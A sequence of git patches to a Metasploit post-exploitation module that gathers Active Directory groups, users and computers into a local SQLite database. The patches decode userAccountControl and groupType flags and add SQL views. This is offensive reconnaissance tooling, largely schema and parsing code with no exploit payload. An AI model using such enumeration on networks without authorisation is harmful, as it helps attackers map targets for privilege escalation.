#Any such service can impersonate a client requesting the service. - ADS_UF_TRUSTED_FOR_DELEGATION: (group_user[7][:value].to_i & 0x00080000) ? 1 : 0, + ADS_UF_TRUSTED_FOR_DELEGATION: (uac_int & 0x00080000) ? 1 : 0, #The security context of the user will not be delegated to a service even if the service #account is set as trusted for Kerberos delegation. - ADS_UF_NOT_DELEGATED: (group_user[7][:value].to_i & 0x00100000) ? 1 : 0, + ADS_UF_NOT_DELEGATED: (uac_int & 0x00100000) ? 1 : 0, #Restrict this principal to use only Data #Encryption Standard (DES) encryption types for keys. - ADS_UF_USE_DES_KEY_ONLY: (group_user[7][:value].to_i & 0x00200000) ? 1 : 0, + ADS_UF_USE_DES_KEY_ONLY: (uac_int & 0x00200000) ? 1 : 0, #This account does not require Kerberos pre-authentication for logon. - ADS_UF_DONT_REQUIRE_PREAUTH: (group_user[7][:value].to_i & 0x00400000) ? 1 : 0, + ADS_UF_DONT_REQUIRE_PREAUTH: (uac_int & 0x00400000) ? 1 : 0, #The password has expired - ADS_UF_PASSWORD_EXPIRED: (group_user[7][:value].to_i & 0x00800000) ? 1 : 0, + ADS_UF_PASSWORD_EXPIRED: (uac_int & 0x00800000) ? 1 : 0, #The account is enabled for delegation. This is a security-sensitive setting; accounts with #this option enabled should be strictly controlled. This setting enables a service running #under the account to assume a client identity and authenticate as that user to other remote #servers on the network. - ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION: (group_user[7][:value].to_i & 0x01000000) ? 1 : 0 + ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION: (uac_int & 0x01000000) ? 1 : 0 } run_sqlite_query(db, 'ad_users', sql_param_user) @@ -304,7 +306,28 @@ class Metasploit3 < Msf::Post 'comments TEXT,'\ 'title TEXT,'\ 'whenCreated TEXT,'\ - 'whenChanged TEXT)' + 'whenChanged TEXT,'\ + 'ADS_UF_SCRIPT INTEGER,'\ + 'ADS_UF_ACCOUNTDISABLE INTEGER,'\ + 'ADS_UF_HOMEDIR_REQUIRED INTEGER,'\ + 'ADS_UF_LOCKOUT INTEGER,'\ + 'ADS_UF_PASSWD_NOTREQD INTEGER,'\ + 'ADS_UF_PASSWD_CANT_CHANGE INTEGER,'\ + 'ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED INTEGER,'\ + 'ADS_UF_TEMP_DUPLICATE_ACCOUNT INTEGER,'\ + 'ADS_UF_NORMAL_ACCOUNT INTEGER,'\ + 'ADS_UF_INTERDOMAIN_TRUST_ACCOUNT INTEGER,'\ + 'ADS_UF_WORKSTATION_TRUST_ACCOUNT INTEGER,'\ + 'ADS_UF_SERVER_TRUST_ACCOUNT INTEGER,'\ + 'ADS_UF_DONT_EXPIRE_PASSWD INTEGER,'\ + 'ADS_UF_MNS_LOGON_ACCOUNT INTEGER,'\ + 'ADS_UF_SMARTCARD_REQUIRED INTEGER,'\ + 'ADS_UF_TRUSTED_FOR_DELEGATION INTEGER,'\ + 'ADS_UF_NOT_DELEGATED INTEGER,'\ + 'ADS_UF_USE_DES_KEY_ONLY INTEGER,'\ + 'ADS_UF_DONT_REQUIRE_PREAUTH INTEGER,'\ + 'ADS_UF_PASSWORD_EXPIRED INTEGER,'\ + 'ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION INTEGER)' db.execute(sql_table_users) # Create the table for the mapping between the two (membership) From e716cd79e376012f7b85293402e2510ea1b96bf9 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Fri, 18 Dec 2015 21:55:55 +0000 Subject: [PATCH 105/686] Needed to use .zero? in the ? : if shorthand for the UAC variables --- .../windows/gather/ad_groupusers_to_sql.rb | 42 +++++++++---------- 1 file changed, 21 insertions(+), 21 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index d124892eef..5d40dbfbb1 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -128,54 +128,54 @@ class Metasploit3 < Msf::Post #system because it was a member of one of the administrative groups (directly or transitively). adminCount: group_user[16][:value].to_i, #The login script is executed - ADS_UF_SCRIPT: (uac_int & 0x00000001) ? 1 : 0, + ADS_UF_SCRIPT: (uac_int & 0x00000001).zero? ? 0 : 1, #The user account is disabled. - ADS_UF_ACCOUNTDISABLE: (uac_int & 0x00000002) ? 1 : 0, + ADS_UF_ACCOUNTDISABLE: (uac_int & 0x00000002).zero? ? 0 : 1, #The home directory is required. - ADS_UF_HOMEDIR_REQUIRED: (uac_int & 0x00000008) ? 1 : 0, + ADS_UF_HOMEDIR_REQUIRED: (uac_int & 0x00000008).zero? ? 0 : 1, #The account is currently locked out. - ADS_UF_LOCKOUT: (uac_int & 0x00000010) ? 1 : 0, + ADS_UF_LOCKOUT: (uac_int & 0x00000010).zero? ? 0 : 1, #No password is required. - ADS_UF_PASSWD_NOTREQD: (uac_int & 0x00000020) ? 1 : 0, + ADS_UF_PASSWD_NOTREQD: (uac_int & 0x00000020).zero? ? 0 : 1, #The user cannot change the password. - ADS_UF_PASSWD_CANT_CHANGE: (uac_int & 0x00000040) ? 1 : 0, + ADS_UF_PASSWD_CANT_CHANGE: (uac_int & 0x00000040).zero? ? 0 : 1, #The user can send an encrypted password. - ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED: (uac_int & 0x00000080) ? 1 : 0, + ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED: (uac_int & 0x00000080).zero? ? 0 : 1, #This is an account for users whose primary account is in another domain. This account #provides user access to this domain, but not to any domain that trusts this domain. #Also known as a local user account. - ADS_UF_TEMP_DUPLICATE_ACCOUNT: (uac_int & 0x00000100) ? 1 : 0, + ADS_UF_TEMP_DUPLICATE_ACCOUNT: (uac_int & 0x00000100).zero? ? 0 : 1, #This is a default account type that represents a typical user. - ADS_UF_NORMAL_ACCOUNT: (uac_int & 0x00000200) ? 1 : 0, + ADS_UF_NORMAL_ACCOUNT: (uac_int & 0x00000200).zero? ? 0 : 1, #This is a permit to trust account for a system domain that trusts other domains. - ADS_UF_INTERDOMAIN_TRUST_ACCOUNT: (uac_int & 0x00000800) ? 1 : 0, + ADS_UF_INTERDOMAIN_TRUST_ACCOUNT: (uac_int & 0x00000800).zero? ? 0 : 1, #This is a computer account for a computer that is a member of this domain. - ADS_UF_WORKSTATION_TRUST_ACCOUNT: (uac_int & 0x00001000) ? 1 : 0, + ADS_UF_WORKSTATION_TRUST_ACCOUNT: (uac_int & 0x00001000).zero? ? 0 : 1, #This is a computer account for a system backup domain controller that is a member of this domain. - ADS_UF_SERVER_TRUST_ACCOUNT: (uac_int & 0x00002000) ? 1 : 0, + ADS_UF_SERVER_TRUST_ACCOUNT: (uac_int & 0x00002000).zero? ? 0 : 1, #The password for this account will never expire. - ADS_UF_DONT_EXPIRE_PASSWD: (uac_int & 0x00010000) ? 1 : 0, + ADS_UF_DONT_EXPIRE_PASSWD: (uac_int & 0x00010000).zero? ? 0 : 1, #This is an MNS logon account. - ADS_UF_MNS_LOGON_ACCOUNT: (uac_int & 0x00020000) ? 1 : 0, + ADS_UF_MNS_LOGON_ACCOUNT: (uac_int & 0x00020000).zero? ? 0 : 1, #The user must log on using a smart card. - ADS_UF_SMARTCARD_REQUIRED: (uac_int & 0x00040000) ? 1 : 0, + ADS_UF_SMARTCARD_REQUIRED: (uac_int & 0x00040000).zero? ? 0 : 1, #The service account (user or computer account), under which a service runs, is trusted for Kerberos delegation. #Any such service can impersonate a client requesting the service. - ADS_UF_TRUSTED_FOR_DELEGATION: (uac_int & 0x00080000) ? 1 : 0, + ADS_UF_TRUSTED_FOR_DELEGATION: (uac_int & 0x00080000).zero? ? 0 : 1, #The security context of the user will not be delegated to a service even if the service #account is set as trusted for Kerberos delegation. - ADS_UF_NOT_DELEGATED: (uac_int & 0x00100000) ? 1 : 0, + ADS_UF_NOT_DELEGATED: (uac_int & 0x00100000).zero? ? 0 : 1, #Restrict this principal to use only Data #Encryption Standard (DES) encryption types for keys. - ADS_UF_USE_DES_KEY_ONLY: (uac_int & 0x00200000) ? 1 : 0, + ADS_UF_USE_DES_KEY_ONLY: (uac_int & 0x00200000).zero? ? 0 : 1, #This account does not require Kerberos pre-authentication for logon. - ADS_UF_DONT_REQUIRE_PREAUTH: (uac_int & 0x00400000) ? 1 : 0, + ADS_UF_DONT_REQUIRE_PREAUTH: (uac_int & 0x00400000).zero? ? 0 : 1, #The password has expired - ADS_UF_PASSWORD_EXPIRED: (uac_int & 0x00800000) ? 1 : 0, + ADS_UF_PASSWORD_EXPIRED: (uac_int & 0x00800000).zero? ? 0 : 1, #The account is enabled for delegation. This is a security-sensitive setting; accounts with #this option enabled should be strictly controlled. This setting enables a service running #under the account to assume a client identity and authenticate as that user to other remote #servers on the network. - ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION: (uac_int & 0x01000000) ? 1 : 0 + ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION: (uac_int & 0x01000000).zero? ? 0 : 1 } run_sqlite_query(db, 'ad_users', sql_param_user) From eade245a9efe43fcae2d404476b4c156148e3a02 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Fri, 18 Dec 2015 22:06:20 +0000 Subject: [PATCH 106/686] Added groupType attribute interpretation --- .../windows/gather/ad_groupusers_to_sql.rb | 34 +++++++++++++++++-- 1 file changed, 32 insertions(+), 2 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index 5d40dbfbb1..6b9f921c33 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -15,7 +15,7 @@ class Metasploit3 < Msf::Post def initialize(info = {}) super(update_info( info, - 'Name' => 'AD Group and User Membership to Offline SQLite Database Recon Module', + 'Name' => 'AD Computer, Group and Recursive User Membership to Local SQLite DB', 'Description' => %{ This module will gather a list of AD groups, identify the users (taking into account recursion) and write this to a SQLite database for offline analysis and query using normal SQL syntax. @@ -85,7 +85,10 @@ class Metasploit3 < Msf::Post users_filter = "(&(objectCategory=person)(objectClass=user)(|(memberOf:1.2.840.113556.1.4.1941:=#{individual_group[0][:value]})(primaryGroupID=#{group_rid})))" users_in_group = query(users_filter, max_search, users_fields) + grouptype_int = individual_group[7][:value].to_i # Set this here because it is used a lot below + # Add the group to the database + # groupType parameter interpretation: https://msdn.microsoft.com/en-us/library/windows/desktop/ms675935(v=vs.85).aspx sql_param_group = { rid: group_rid.to_i, distinguishedName: individual_group[0][:value].to_s, sAMAccountType: individual_group[2][:value].to_i, @@ -95,6 +98,25 @@ class Metasploit3 < Msf::Post description: individual_group[6][:value].to_s, groupType: individual_group[7][:value].to_i, adminCount: individual_group[8][:value].to_i, + # Specifies a group that is created by the system. + GT_GROUP_CREATED_BY_SYSTEM: (grouptype_int & 0x00000001).zero? ? 0 : 1, + # Specifies a group with global scope. + GT_GROUP_SCOPE_GLOBAL: (grouptype_int & 0x00000002).zero? ? 0 : 1, + # Specifies a group with local scope. + GT_GROUP_SCOPE_LOCAL: (grouptype_int & 0x00000004).zero? ? 0 : 1, + # Specifies a group with universal scope. + GT_GROUP_SCOPE_UNIVERSAL: (grouptype_int & 0x00000008).zero? ? 0 : 1, + # Specifies an APP_BASIC group for Windows Server Authorization Manager. + GT_GROUP_SAM_APP_BASIC: (grouptype_int & 0x00000010).zero? ? 0 : 1, + # Specifies an APP_QUERY group for Windows Server Authorization Manager. + GT_GROUP_SAM_APP_QUERY: (grouptype_int & 0x00000020).zero? ? 0 : 1, + # Specifies a security group. If this flag is not set, then the group is a distribution group. + GT_GROUP_SECURITY: (grouptype_int & 0x80000000).zero? ? 0 : 1, + # The inverse of the flag above. Technically GT_GROUP_SECURITY=0 makes it a distribution + # group so this is arguably redundant, but I have included it for ease. It makes a lot more sense + # to set DISTRIBUTION=1 in a query when your mind is on other things to remember that + # DISTRIBUTION is in fact the inverse of SECURITY...:) + GT_GROUP_DISTRIBUTION: (grouptype_int & 0x80000000).zero? ? 1 : 0, } run_sqlite_query(db, 'ad_groups', sql_param_group) @@ -284,7 +306,15 @@ class Metasploit3 < Msf::Post 'adminCount INTEGER,'\ 'description TEXT,'\ 'whenChanged TEXT,'\ - 'whenCreated TEXT)' + 'whenCreated TEXT,'\ + 'GT_GROUP_CREATED_BY_SYSTEM INTEGER,'\ + 'GT_GROUP_SCOPE_GLOBAL INTEGER,'\ + 'GT_GROUP_SCOPE_LOCAL INTEGER,'\ + 'GT_GROUP_SCOPE_UNIVERSAL INTEGER,'\ + 'GT_GROUP_SAM_APP_BASIC INTEGER,'\ + 'GT_GROUP_SAM_APP_QUERY INTEGER,'\ + 'GT_GROUP_SECURITY INTEGER,'\ + 'GT_GROUP_DISTRIBUTION INTEGER)' db.execute(sql_table_group) # Create the table for the AD Users From cf8f0e2483f7070b24df3fa254254482fb2a5649 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Fri, 18 Dec 2015 22:22:56 +0000 Subject: [PATCH 107/686] Added userAccountControl to the computer table. Note that computer and user LDAP entries are more or less the same (user is the parent for computer), but it makes sense just for sanity and ease of use to keep them separate. --- .../windows/gather/ad_groupusers_to_sql.rb | 83 ++++++++++++++++++- 1 file changed, 80 insertions(+), 3 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index 6b9f921c33..925e0f8963 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -226,7 +226,14 @@ class Metasploit3 < Msf::Post computers[:results].each do |comp| computer_sid, computer_rid = sid_hex_to_string(comp[1][:value]) + uac_int = comp_user[8][:value].to_i #Set this because it is used so frequently below + # Add the group to the database + # Also parse the ADF_ flags from userAccountControl: https://msdn.microsoft.com/en-us/library/windows/desktop/ms680832(v=vs.85).aspx + # Note that userAccountControl is basically the same for a computer as a user; this is because a computer account is derived from a user account + # (if you look at the objectClass for a computer account, it includes 'user') and, for efficiency, we should really store it all in one + # table. However, the reality is that it will get annoying for users to have to remember to use the userAccountControl flags to work out whether + # its a user or a computer and so, for convenience and ease of use, I have put them in completely separate tables. sql_param_computer = { rid: computer_rid.to_i, distinguishedName: comp[0][:value].to_s, cn: comp[2][:value].to_s, @@ -235,7 +242,7 @@ class Metasploit3 < Msf::Post sAMAccountName: comp[5][:value].to_s, displayName: comp[6][:value].to_s, logonCount: comp[7][:value].to_i, - userAccountControl: comp[8][:value].to_s, + userAccountControl: uac_int, whenChanged: comp[9][:value].to_s, whenCreated: comp[10][:value].to_s, primaryGroupID: comp[11][:value].to_i, @@ -243,6 +250,55 @@ class Metasploit3 < Msf::Post operatingSystem: comp[13][:value].to_s, operatingSystemServicePack: comp[14][:value].to_s, operatingSystemVersion: comp[15][:value].to_s, + #The login script is executed + ADS_UF_SCRIPT: (uac_int & 0x00000001).zero? ? 0 : 1, + #The user account is disabled. + ADS_UF_ACCOUNTDISABLE: (uac_int & 0x00000002).zero? ? 0 : 1, + #The home directory is required. + ADS_UF_HOMEDIR_REQUIRED: (uac_int & 0x00000008).zero? ? 0 : 1, + #The account is currently locked out. + ADS_UF_LOCKOUT: (uac_int & 0x00000010).zero? ? 0 : 1, + #No password is required. + ADS_UF_PASSWD_NOTREQD: (uac_int & 0x00000020).zero? ? 0 : 1, + #The user cannot change the password. + ADS_UF_PASSWD_CANT_CHANGE: (uac_int & 0x00000040).zero? ? 0 : 1, + #The user can send an encrypted password. + ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED: (uac_int & 0x00000080).zero? ? 0 : 1, + #This is an account for users whose primary account is in another domain. This account + #provides user access to this domain, but not to any domain that trusts this domain. + #Also known as a local user account. + ADS_UF_TEMP_DUPLICATE_ACCOUNT: (uac_int & 0x00000100).zero? ? 0 : 1, + #This is a default account type that represents a typical user. + ADS_UF_NORMAL_ACCOUNT: (uac_int & 0x00000200).zero? ? 0 : 1, + #This is a permit to trust account for a system domain that trusts other domains. + ADS_UF_INTERDOMAIN_TRUST_ACCOUNT: (uac_int & 0x00000800).zero? ? 0 : 1, + #This is a computer account for a computer that is a member of this domain. + ADS_UF_WORKSTATION_TRUST_ACCOUNT: (uac_int & 0x00001000).zero? ? 0 : 1, + #This is a computer account for a system backup domain controller that is a member of this domain. + ADS_UF_SERVER_TRUST_ACCOUNT: (uac_int & 0x00002000).zero? ? 0 : 1, + #The password for this account will never expire. + ADS_UF_DONT_EXPIRE_PASSWD: (uac_int & 0x00010000).zero? ? 0 : 1, + #This is an MNS logon account. + ADS_UF_MNS_LOGON_ACCOUNT: (uac_int & 0x00020000).zero? ? 0 : 1, + #The user must log on using a smart card. + ADS_UF_SMARTCARD_REQUIRED: (uac_int & 0x00040000).zero? ? 0 : 1, + #The service account (user or computer account), under which a service runs, is trusted for Kerberos delegation. + #Any such service can impersonate a client requesting the service. + ADS_UF_TRUSTED_FOR_DELEGATION: (uac_int & 0x00080000).zero? ? 0 : 1, + #The security context of the user will not be delegated to a service even if the service + #account is set as trusted for Kerberos delegation. + ADS_UF_NOT_DELEGATED: (uac_int & 0x00100000).zero? ? 0 : 1, + #Restrict this principal to use only Data #Encryption Standard (DES) encryption types for keys. + ADS_UF_USE_DES_KEY_ONLY: (uac_int & 0x00200000).zero? ? 0 : 1, + #This account does not require Kerberos pre-authentication for logon. + ADS_UF_DONT_REQUIRE_PREAUTH: (uac_int & 0x00400000).zero? ? 0 : 1, + #The password has expired + ADS_UF_PASSWORD_EXPIRED: (uac_int & 0x00800000).zero? ? 0 : 1, + #The account is enabled for delegation. This is a security-sensitive setting; accounts with + #this option enabled should be strictly controlled. This setting enables a service running + #under the account to assume a client identity and authenticate as that user to other remote + #servers on the network. + ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION: (uac_int & 0x01000000).zero? ? 0 : 1 } run_sqlite_query(db, 'ad_computers', sql_param_computer) print_line "Computer [#{sql_param_computer[:cn]}][#{sql_param_computer[:dNSHostName]}][#{sql_param_computer[:rid]}]" if datastore['SHOW_USERGROUPS'] @@ -281,7 +337,7 @@ class Metasploit3 < Msf::Post 'distinguishedName TEXT UNIQUE NOT NULL,'\ 'cn TEXT,'\ 'sAMAccountType INTEGER,'\ - 'sAMAccountName TEXT UNIQUE,'\ + 'sAMAccountName TEXT UNIQUE NOT NULL,'\ 'dNSHostName TEXT,'\ 'displayName TEXT,'\ 'logonCount INTEGER,'\ @@ -292,7 +348,28 @@ class Metasploit3 < Msf::Post 'operatingSystemServicePack TEXT,'\ 'operatingSystemVersion TEXT,'\ 'whenChanged TEXT,'\ - 'whenCreated TEXT)' + 'whenChanged TEXT,'\ + 'ADS_UF_SCRIPT INTEGER,'\ + 'ADS_UF_ACCOUNTDISABLE INTEGER,'\ + 'ADS_UF_HOMEDIR_REQUIRED INTEGER,'\ + 'ADS_UF_LOCKOUT INTEGER,'\ + 'ADS_UF_PASSWD_NOTREQD INTEGER,'\ + 'ADS_UF_PASSWD_CANT_CHANGE INTEGER,'\ + 'ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED INTEGER,'\ + 'ADS_UF_TEMP_DUPLICATE_ACCOUNT INTEGER,'\ + 'ADS_UF_NORMAL_ACCOUNT INTEGER,'\ + 'ADS_UF_INTERDOMAIN_TRUST_ACCOUNT INTEGER,'\ + 'ADS_UF_WORKSTATION_TRUST_ACCOUNT INTEGER,'\ + 'ADS_UF_SERVER_TRUST_ACCOUNT INTEGER,'\ + 'ADS_UF_DONT_EXPIRE_PASSWD INTEGER,'\ + 'ADS_UF_MNS_LOGON_ACCOUNT INTEGER,'\ + 'ADS_UF_SMARTCARD_REQUIRED INTEGER,'\ + 'ADS_UF_TRUSTED_FOR_DELEGATION INTEGER,'\ + 'ADS_UF_NOT_DELEGATED INTEGER,'\ + 'ADS_UF_USE_DES_KEY_ONLY INTEGER,'\ + 'ADS_UF_DONT_REQUIRE_PREAUTH INTEGER,'\ + 'ADS_UF_PASSWORD_EXPIRED INTEGER,'\ + 'ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION INTEGER)' db.execute(sql_table_computers) # Create the table for the AD Groups From ba9845818e7fcbc0b170594fc6586d7f6e037ec5 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Fri, 18 Dec 2015 23:22:22 +0000 Subject: [PATCH 108/686] Appears to work for the computers table (tables and view) --- .../windows/gather/ad_groupusers_to_sql.rb | 51 ++++++++++++++++++- 1 file changed, 49 insertions(+), 2 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index 925e0f8963..03a1dfac90 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -226,7 +226,7 @@ class Metasploit3 < Msf::Post computers[:results].each do |comp| computer_sid, computer_rid = sid_hex_to_string(comp[1][:value]) - uac_int = comp_user[8][:value].to_i #Set this because it is used so frequently below + uac_int = comp[8][:value].to_i #Set this because it is used so frequently below # Add the group to the database # Also parse the ADF_ flags from userAccountControl: https://msdn.microsoft.com/en-us/library/windows/desktop/ms680832(v=vs.85).aspx @@ -309,6 +309,7 @@ class Metasploit3 < Msf::Post return end + # Finished enumeration, now safely close the database if db && db.close f = ::File.size(dbfile.to_s) print_status "Database closed: #{dbfile} at #{f} byte(s)" @@ -348,7 +349,7 @@ class Metasploit3 < Msf::Post 'operatingSystemServicePack TEXT,'\ 'operatingSystemVersion TEXT,'\ 'whenChanged TEXT,'\ - 'whenChanged TEXT,'\ + 'whenCreated TEXT,'\ 'ADS_UF_SCRIPT INTEGER,'\ 'ADS_UF_ACCOUNTDISABLE INTEGER,'\ 'ADS_UF_HOMEDIR_REQUIRED INTEGER,'\ @@ -471,6 +472,52 @@ class Metasploit3 < Msf::Post db.execute("insert into ref_sAMAccountType (name,id) VALUES ('SAM_APP_QUERY_GROUP',0x40000001)") db.execute("insert into ref_sAMAccountType (name,id) VALUES ('SAM_ACCOUNT_TYPE_MAX',0x7fffffff)") + # Now create the computer query view (which joins lookup tables and prefixes everything with c_) + # This is essentially to maintain namespace (less of an issue for computers but + # I have done it for this table too in order to maintain consistency) + db.execute('DROP VIEW IF EXISTS view_ad_computers') + sql_view_computers = 'CREATE VIEW view_ad_computers AS SELECT '\ + 'rid AS c_rid,'\ + 'distinguishedName AS c_distinguishedName,'\ + 'cn AS c_cn,'\ + 'sAMAccountType AS c_sAMAccountType,'\ + 'sAMAccountName AS c_sAMAccountName,'\ + 'dNSHostName AS c_dNSHostName,'\ + 'displayName AS c_displayName,'\ + 'logonCount AS c_logonCount,'\ + 'userAccountControl AS c_userAccountControl,'\ + 'primaryGroupID AS c_primaryGroupID,'\ + 'badPwdCount AS c_badPwdCount,'\ + 'operatingSystem AS c_operatingSystem,'\ + 'operatingSystemServicePack AS c_operatingSystemServicePack,'\ + 'operatingSystemVersion AS c_operatingSystemVersion,'\ + 'whenCreated AS c_whenCreated,'\ + 'whenChanged AS c_whenChanged,'\ + 'ADS_UF_SCRIPT AS c_ADS_UF_SCRIPT,'\ + 'ADS_UF_ACCOUNTDISABLE AS c_ADS_UF_ACCOUNTDISABLE,'\ + 'ADS_UF_HOMEDIR_REQUIRED AS c_ADS_UF_HOMEDIR_REQUIRED,'\ + 'ADS_UF_LOCKOUT AS c_ADS_UF_LOCKOUT,'\ + 'ADS_UF_PASSWD_NOTREQD AS c_ADS_UF_PASSWD_NOTREQD,'\ + 'ADS_UF_PASSWD_CANT_CHANGE AS c_ADS_UF_PASSWD_CANT_CHANGE,'\ + 'ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED AS c_ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED,'\ + 'ADS_UF_TEMP_DUPLICATE_ACCOUNT AS c_ADS_UF_TEMP_DUPLICATE_ACCOUNT,'\ + 'ADS_UF_NORMAL_ACCOUNT AS c_ADS_UF_NORMAL_ACCOUNT,'\ + 'ADS_UF_INTERDOMAIN_TRUST_ACCOUNT AS c_ADS_UF_INTERDOMAIN_TRUST_ACCOUNT,'\ + 'ADS_UF_WORKSTATION_TRUST_ACCOUNT AS c_ADS_UF_WORKSTATION_TRUST_ACCOUNT,'\ + 'ADS_UF_SERVER_TRUST_ACCOUNT AS c_ADS_UF_SERVER_TRUST_ACCOUNT,'\ + 'ADS_UF_DONT_EXPIRE_PASSWD AS c_ADS_UF_DONT_EXPIRE_PASSWD,'\ + 'ADS_UF_MNS_LOGON_ACCOUNT AS c_ADS_UF_MNS_LOGON_ACCOUNT,'\ + 'ADS_UF_SMARTCARD_REQUIRED AS c_ADS_UF_SMARTCARD_REQUIRED,'\ + 'ADS_UF_TRUSTED_FOR_DELEGATION AS c_ADS_UF_TRUSTED_FOR_DELEGATION,'\ + 'ADS_UF_NOT_DELEGATED AS c_ADS_UF_NOT_DELEGATED,'\ + 'ADS_UF_USE_DES_KEY_ONLY AS c_ADS_UF_USE_DES_KEY_ONLY,'\ + 'ADS_UF_DONT_REQUIRE_PREAUTH AS c_ADS_UF_DONT_REQUIRE_PREAUTH,'\ + 'ADS_UF_PASSWORD_EXPIRED AS c_ADS_UF_PASSWORD_EXPIRED,'\ + 'ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION AS c_ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION '\ + 'FROM ad_computers LEFT JOIN ref_sAMAccountType ON ref_sAMAccountType.id = ad_computers.sAMAccountType' + print_line sql_view_computers + db.execute(sql_view_computers) + return db, filename rescue SQLite3::Exception => e print_error("Error(Database): #{e.message}") From 82c3ec5f4b2b50b1d37edc6df85bfee2c9031dfe Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Sat, 19 Dec 2015 00:26:31 +0000 Subject: [PATCH 109/686] Added views for users and groups table --- .../windows/gather/ad_groupusers_to_sql.rb | 67 ++++++++++++++++++- 1 file changed, 66 insertions(+), 1 deletion(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index 03a1dfac90..2b984caafc 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -481,6 +481,7 @@ class Metasploit3 < Msf::Post 'distinguishedName AS c_distinguishedName,'\ 'cn AS c_cn,'\ 'sAMAccountType AS c_sAMAccountType,'\ + 'ref_sAMAccountType.name AS c_sAMAccountType_Name,'\ 'sAMAccountName AS c_sAMAccountName,'\ 'dNSHostName AS c_dNSHostName,'\ 'displayName AS c_displayName,'\ @@ -515,10 +516,74 @@ class Metasploit3 < Msf::Post 'ADS_UF_PASSWORD_EXPIRED AS c_ADS_UF_PASSWORD_EXPIRED,'\ 'ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION AS c_ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION '\ 'FROM ad_computers LEFT JOIN ref_sAMAccountType ON ref_sAMAccountType.id = ad_computers.sAMAccountType' - print_line sql_view_computers db.execute(sql_view_computers) + # Create the view for the AD Groups + db.execute('DROP VIEW IF EXISTS view_ad_groups') + sql_view_group = 'CREATE VIEW view_ad_groups AS SELECT '\ + 'rid AS u_rid,'\ + 'distinguishedName AS u_distinguishedName,'\ + 'sAMAccountType AS u_sAMAccountType,'\ + 'sAMAccountName AS u_sAMAccountName,'\ + 'groupType AS u_groupType,'\ + 'adminCount AS u_adminCount,'\ + 'description AS u_description,'\ + 'whenChanged AS u_whenChanged,'\ + 'whenCreated AS u_whenCreated,'\ + 'GT_GROUP_CREATED_BY_SYSTEM AS u_GT_GROUP_CREATED_BY_SYSTEM,'\ + 'GT_GROUP_SCOPE_GLOBAL AS u_GT_GROUP_SCOPE_GLOBAL,'\ + 'GT_GROUP_SCOPE_LOCAL AS u_GT_GROUP_SCOPE_LOCAL,'\ + 'GT_GROUP_SCOPE_UNIVERSAL AS u_GT_GROUP_SCOPE_UNIVERSAL,'\ + 'GT_GROUP_SAM_APP_BASIC AS u_GT_GROUP_SAM_APP_BASIC,'\ + 'GT_GROUP_SAM_APP_QUERY AS u_GT_GROUP_SAM_APP_QUERY,'\ + 'GT_GROUP_SECURITY AS u_GT_GROUP_SECURITY,'\ + 'GT_GROUP_DISTRIBUTION as U_GT_GROUP_DISTRIBUTION' + db.execute(sql_view_group) + + # Create the view for the AD Users + db.execute('DROP VIEW IF EXISTS view_ad_users') + sql_view_users = 'CREATE VIEW view_ad_users AS SELECT '\ + 'rid AS g_rid,'\ + 'distinguishedName AS g_distinguishedName,'\ + 'description AS g_description,'\ + 'displayName AS g_displayName,'\ + 'sAMAccountType AS g_sAMAccountType,'\ + 'sAMAccountName AS g_sAMAccountName,'\ + 'logonCount AS g_logonCount,'\ + 'userAccountControl AS g_userAccountControl,'\ + 'primaryGroupID AS g_primaryGroupID,'\ + 'accountExpires AS g_accountExpires,'\ + 'adminCount AS g_adminCount,'\ + 'badPwdCount AS g_badPwdCount,'\ + 'userPrincipalName AS g_userPrincipalName,'\ + 'comments AS g_comments,'\ + 'title AS g_title,'\ + 'whenCreated AS g_whenCreated,'\ + 'whenChanged AS g_whenChanged,'\ + 'ADS_UF_SCRIPT AS g_ADS_UF_SCRIPT,'\ + 'ADS_UF_ACCOUNTDISABLE AS g_ADS_UF_ACCOUNTDISABLE,'\ + 'ADS_UF_HOMEDIR_REQUIRED AS g_ADS_UF_HOMEDIR_REQUIRED,'\ + 